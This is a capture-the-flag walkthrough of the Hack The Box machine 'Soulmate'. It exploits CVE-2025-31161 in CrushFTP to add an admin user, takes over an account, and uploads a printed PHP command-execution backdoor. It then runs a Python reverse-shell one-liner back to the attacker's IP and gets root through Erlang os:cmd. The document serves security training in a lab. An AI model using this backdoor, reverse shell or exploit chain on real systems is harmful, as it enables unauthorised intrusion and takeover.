https://app.hackthebox.com/machines/Soulmate
IP
10.10.11.86
Domain/Hosts
soulmate.htb ftp.soulmate.htb
Nmap Results
Web Enumeration
Soulmate.htb
We open http://soulmate.htb/ in the browser
We see a dating site where we can register and log in as a new user
Dating Profile
Info
I examined the page but didn’t find anything useful that could help us exploit a vulnerability or gain
further access — at least not for now, but it might become relevant later.
We enumerate web directories on soulmate.htb with Feroxbuster
feroxbuster -u http://soulmate.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js,json,txt,log -t 50 -e
Nothing useful
ftp.soulmate.htb
We fuzz subdomains on soulmate.htb with FFUF
ffuf -u http://10.129.xxx.175 -H "Host: FUZZ.soulmate.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 4
We found the subdomain ftp.soulmate.htb
Let's open http://ftp.soulmate.htb in the browser
We are redirected to http://ftp.soulmate.htb/WebInterface/login.html
It's a CrushFTP login page
Let's check the source code for version hints
Info
CrushFTP Version
When inspecting the HTML source code of the CrushFTP login page, we notice that the URLs of the
JavaScript and CSS files contain an embedded version identifier:
<script type="module" crossorigin src="/WebInterface/new-ui/assets/app/components/loader2.js?v=11.W.657-2025_03_08_07_52"></script>
The version string 11.W.657-2025_03_08_07_52 is repeated in several places, confirming that the running
CrushFTP version is 11.W.657, built on March 8, 2025.
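To check what a login page of this kind leaks, here is an added Python check (not from the write-up and not CrushFTP's own code) that pulls the version identifier out of the asset URLs; the HTML sample is constructed to match the markup pattern above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample that reproduces the login-page markup pattern described above.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="/WebInterface/new-ui/assets/app/app.css?v=11.W.657-2025_03_08_07_52">
<script type="module" crossorigin src="/WebInterface/new-ui/assets/app/components/loader2.js?v=11.W.657-2025_03_08_07_52"></script>
<script src="/WebInterface/new-ui/assets/vendor.js"></script>
</head><body></body></html>"""

# <version>-<build timestamp>, e.g. 11.W.657-2025_03_08_07_52
VERSION_RE = re.compile(r"^(?P<version>\d+\.[A-Za-z0-9]+\.\d+)-(?P<build>\d{4}(?:_\d{2})+)$")


class AssetVersionParser(HTMLParser):
    """Collect every ?v= query value from <script src=...> and <link href=...> tags."""

    def __init__(self):
        super().__init__()
        self.values = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        url = attrs.get("src") if tag == "script" else attrs.get("href") if tag == "link" else None
        if url:
            self.values.extend(parse_qs(urlsplit(url).query).get("v", []))


def crushftp_version(html):
    """Return (version, build_timestamp) from the first matching asset URL, else None."""
    parser = AssetVersionParser()
    parser.feed(html)
    for value in parser.values:
        m = VERSION_RE.match(value)
        if m:
            return m.group("version"), m.group("build")
    return None


def build_date(build):
    """Turn a build stamp such as 2025_03_08_07_52 into 'YYYY-MM-DD HH:MM'."""
    year, month, day, hour, minute = build.split("_")
    return f"{year}-{month}-{day} {hour}:{minute}"


if __name__ == "__main__":
    found = crushftp_version(SAMPLE_HTML)
    print("no version identifier found" if found is None else f"CrushFTP {found[0]} built {build_date(found[1])}")
```

Run against the HTML of your own instance's login page to see exactly what an unauthenticated visitor can read off it.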
CVE-2025-31161
Several CVEs exist for this version
Let's try CVE-2025-31161
We use https://github.com/Immersive-Labs-Sec/CVE-2025-31161
We clone CVE-2025-31161 exploit repo
git clone https://github.com/Immersive-Labs-Sec/CVE-2025-31161.git
We exploit CVE-2025-31161 to add the user zero
python3 cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user root --new_user zero --password 1234
The user zero with password 1234 was created successfully
We log in with the created user
The login succeeds and the user has admin rights
We go to the admin section, User Manager:
http://ftp.soulmate.htb/WebInterface/UserManager/index.html
We see several users and select one
We can change the password
I change the PW of the user ben to 123456
Then click Save
We are now user ben
We go to http://ftp.soulmate.htb/#/webProd/
and use the Add files function
We upload simplebackdoor.php
simplebackdoor.php
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
We open the web shell at http://soulmate.htb/simplebackdoor.php
Start a listener
pwncat-cs --listen --port 4444
I use the python3 revshell
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.xx.1x4",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
We trigger the revshell
http://soulmate.htb/simplebackdoor.php?cmd=python3%20-c%20%27import%20os,pty,socket;s=socket.socket();s.connect((%2210.10.xx.1x4%22,4444));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(%22sh%22)%27
Summary
Revshell
At first, we tried accessing the file at
http://ftp.soulmate.htb/#/webProd/simplebackdoor.php
but this only triggered a download of the file instead of executing it.
The application stores uploaded files in a published web directory that can be accessed via the browser. In the case of ftp.soulmate.htb, we used the upload function at
http://ftp.soulmate.htb/#/webProd/
However, the upload is not placed directly under /webProd/. Instead, it is stored in the document root (e.g., /var/www/html/ or a similar location). From experience with similar applications (and sometimes due to web app design flaws), we can assume that the files become accessible in the main web root.
Therefore, when we browsed to
http://soulmate.htb/simplebackdoor.php
the PHP code was executed, and we successfully gained a web shell.
First Foothold
We have a shell on the machine
We run LinPEAS
./linpeas.sh
We see some open ports
Let's check port 2222
nc 127.0.0.1 2222
SSH-2.0-Erlang/5.2.9 ✅
Erlang
While reviewing the LinPEAS output, we repeatedly came across references to Erlang components, indicating that the environment makes extensive use of Erlang.
We check the erlang_login directory
cd /usr/local/lib/erlang_login
We list files with ls -al
ls -al
We read start.escript
cat /usr/local/lib/erlang_login/start.escript
We found the credentials
user=ben PW=HouseH0ldings998 ✅
User Flag
We log in via SSH as ben
ssh [email protected]
We read the user.txt flag 🏁
cat user.txt
Summary
Get User
While running LinPEAS, we noticed an unusual directory under /usr/local/lib/:
/usr/local/lib/erlang_login/start.escript
/usr/local/lib/erlang_login/login.escript
/usr/local/lib/erlang_login/login_wrapper
These files do not belong to a default Erlang installation and appear to have been manually added. The
directory name erlang_login suggests that this is a custom service, most likely handling some form of
authentication or login functionality.
To further investigate, we used Netcat against localhost on port 2222:
nc 127.0.0.1 2222
We received the following banner in response:
SSH-2.0-Erlang/5.2.9
This confirms that a custom SSH-like service built on Erlang is running on port 2222. Since it is named erlang_login, it is highly likely that the scripts contain hardcoded credentials or authentication logic. Analyzing the content of start.escript or login.escript could therefore reveal valid login details and serve as a potential path for exploitation.
Privesc
We check sudo privileges
sudo -l
ben has no sudo rights
Info
Since we previously observed with Netcat that an SSH service is running on port 2222, we decided to attempt logging in as the user ben.
We pivot via SSH on port 2222 as ben
PW=HouseH0ldings998
ssh ben@localhost -p 2222
We are inside the Erlang shell
I Google code execution in Erlang
Further down during our Google search, we came across a helpful page that provided us with additional information to continue the attack.
We execute the id command via the Erlang shell
os:cmd("id").
The shell runs with root rights ✅
We read root.txt via the Erlang shell
os:cmd("cat /root/root.txt").
We got the root flag
Summary
Privesc
While running LinPEAS, we discovered an unusual service under /usr/local/lib/erlang_login/, which contained several .escript files. The naming suggested that this was a custom login service built with Erlang.
Testing with Netcat revealed that a service was listening on 127.0.0.1:2222, responding with the banner SSH-2.0-Erlang/5.2.9. Based on this, we attempted to log in with the user ben.
We eventually gained access to an Erlang shell, where we could execute arbitrary system commands using
the os:cmd/1 function. We verified our root privileges with:
os:cmd("id").
The commands for OS command execution in Erlang were found here:
https://vuln.be/post/os-command-and-code-execution-in-erlang-and-elixir/
After confirming that we had root privileges, we retrieved the root flag with:
os:cmd("cat /root/root.txt").
Write up created from